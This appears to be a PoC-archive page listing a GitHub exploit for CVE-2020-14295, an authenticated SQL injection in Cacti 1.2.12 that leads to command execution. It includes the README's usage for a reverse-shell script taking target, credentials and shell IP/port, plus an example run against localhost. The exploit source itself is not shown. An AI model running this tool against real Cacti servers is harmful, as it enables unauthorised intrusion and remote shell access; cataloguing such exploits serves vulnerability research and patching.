Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-14295 PoC — Cacti SQL注入漏洞

Source
https://github.com/0z09e/CVE-2020-14295
Associated Vulnerability
Title:Cacti SQL注入漏洞 (CVE-2020-14295)
Description:A SQL injection issue in color.php in Cacti 1.2.12 allows an admin to inject SQL via the filter parameter. This can lead to remote command execution because the product accepts stacked queries.
Description
Authenticated SQL injection to command execution on Cacti 1.2.12
Readme
# CVE-2020-14295
***
Vulnerability details - https://github.com/Cacti/cacti/issues/3622

## Install
`pip3 install -r requirements.txt`

## Usage 
```
$ ./gimme-a-shell.py --help
usage: gimme-a-shell.py [-h] -t Target -U Username -P Password -i Shell-IP -p Shell-Port

optional arguments:
  -h, --help     show this help message and exit

required arguments:
  -t Target      Target URL
  -U Username    Cacti username
  -P Password    Cacti password
  -i Shell-IP    Reverse-Shell IP
  -p Shell-Port  Reverse-Shell Port
```
## Example 
`./gimme-a-shell.py -t http://cacti.localhost -U admin -P admin -i 127.0.0.1 -p 9001`
File Snapshot

 [4.0K]  /data/pocs/b9eda427ce31b0f2b47675138286c2176f64848d
├── [3.9K]  gimme-a-shell.py
├── [ 34K]  LICENSE
├── [ 621]  README.md
└── [   8]  requirements.txt

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →